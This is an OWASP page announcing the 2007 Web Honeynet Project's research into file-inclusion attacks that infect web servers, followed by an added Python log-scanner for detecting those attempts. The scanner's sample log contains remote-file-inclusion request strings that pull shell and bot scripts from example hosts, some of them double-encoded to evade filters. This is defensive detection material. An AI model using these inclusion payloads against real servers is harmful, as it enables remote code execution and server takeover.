Announce:Web Honeynet

From OWASP
Revision as of 12:09, 26 May 2009 by Deleted user

Web Honeynet Project Announcement

Posted January 23rd, 2007

The newly formed Web Honeynet Project from SecuriTeam and the ISOTF will, in the next few months, announce research on real-world web server attacks which infect web servers with tools, connect-back shells, bots, downloaders, malware, etc., which are all cross-platform (for web servers) and currently exploited in the wild.

The Web Honeynet Project will, for now, not deal with the regular SQL injection and XSS attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

These attacks form botnets constructed from web servers (mainly IIS and Apache on Linux and Windows servers) and transform hosting farms/colos to attack platforms.

Most of these "tools" are being injected by (mainly) file inclusion attacks against (mainly) PHP web applications, as is well known and established.

PHP (or scripting) shells, etc. have been known for a while, as well as file inclusion (or RFI) attacks, however, mostly as something secondary and not much (if any - save for some blogs and a few mailing list posts a year ago) attention was given to the subject other than to the vulnerabilities themselves.

The bad guys currently exploit, create botnets and deface in a massive fashion and force ISPs and colos to combat an impossible situation where any (mainly) PHP application from any user can exploit entire server farms, and where the web vulnerability serves as a remote exploit to be followed by a local code execution one, or as a direct one.

What is new here is the scale, and the fact that we now start engaging the bad guys on this front (on which, so far, they have been unchallenged) - meaning that, aside from research, the Web Honeynet Project will also release actionable data on offensive IP addresses, URLs and on the tools themselves, to be made available to operational folks so that they can mitigate the threat.

It's long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc. years ago. Several folks (and quite loudly - me) have been warning about this for a while; now it's time to take action instead of talk. :)

Note: Below you can find sample statistics on some of the Web Honeynet Project information for this last Wednesday, on file inclusion attacks seeding malware. You will likely notice most of these have been taken care of by now.

The first research on the subject (after looking into several hundred such tools) will be made public in the February edition of the Virus Bulletin magazine, from: Kfir Damari, Noam Rathaus and Gadi Evron (yours truly).

The SecuriTeam and ISOTF Web Honeynet Project would like to thank Beyond Security ( http://www.beyondsecurity.com ) for all the support.

Special thanks (so far) to: Ryan Carter, Randy Vaughn and the rest of the new members of the project.

For more information on the Web Honeynet Project feel free to contact me.

Also, thanks to yet others who helped me form this research and operations hybrid project (you know who you are).

-- Gadi.
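
The announcement describes collecting file inclusion attempts and publishing the offending IP addresses and tool URLs. The sketch below is an added example, not code from the Web Honeynet Project: it scans web server access logs for query parameters whose decoded value is a remote URL and tallies sources and fetched URLs. The log lines, hosts, parameter names and function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample in Apache combined log format (documentation IPs, example hosts).
SAMPLE_LOG = """\
192.0.2.10 - - [17/Jan/2007:10:01:02 +0000] "GET /index.php?page=http://tools.example.net/shell.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
192.0.2.10 - - [17/Jan/2007:10:01:09 +0000] "GET /gallery.php?inc=http%3A%2F%2Ftools.example.net%2Fbot.txt%3F HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
198.51.100.7 - - [17/Jan/2007:10:02:30 +0000] "GET /index.php?page=about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Jan/2007:10:03:11 +0000] "GET /view.php?cfg=%2568ttp%253A%252F%252Fdrop.example.org%252Fc.txt HTTP/1.0" 200 98 "-" "-"
198.51.100.7 - - [17/Jan/2007:10:04:00 +0000] "GET /login.php?next=/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Jan/2007:10:05:42 +0000] "GET /index.php?page=FTP://drop.example.org/c.txt HTTP/1.0" 200 98 "-" "-"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def decode(value, rounds=2):
    """Undo extra layers of percent-encoding (parse_qsl already removed one)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_inclusion_attempts(log_text):
    """Return (source_ip, parameter, remote_url) for each parameter carrying a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we understand
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = decode(value).strip()
            if REMOTE_RE.match(value):
                # Attackers often append '?' to neutralise a suffix the script adds.
                hits.append((m["ip"], name, value.rstrip("?")))
    return hits

def summarize(hits):
    """Tally attempts per source IP and per remote URL, the two lists the post mentions."""
    return Counter(ip for ip, _, _ in hits), Counter(url for _, _, url in hits)

if __name__ == "__main__":
    by_ip, by_url = summarize(find_inclusion_attempts(SAMPLE_LOG))
    print(by_ip.most_common(), by_url.most_common(), sep="\n")
```

Parameters that legitimately carry absolute URLs (redirect targets, feed readers) will also match, so a production rule needs a per-application allowlist of such parameter names.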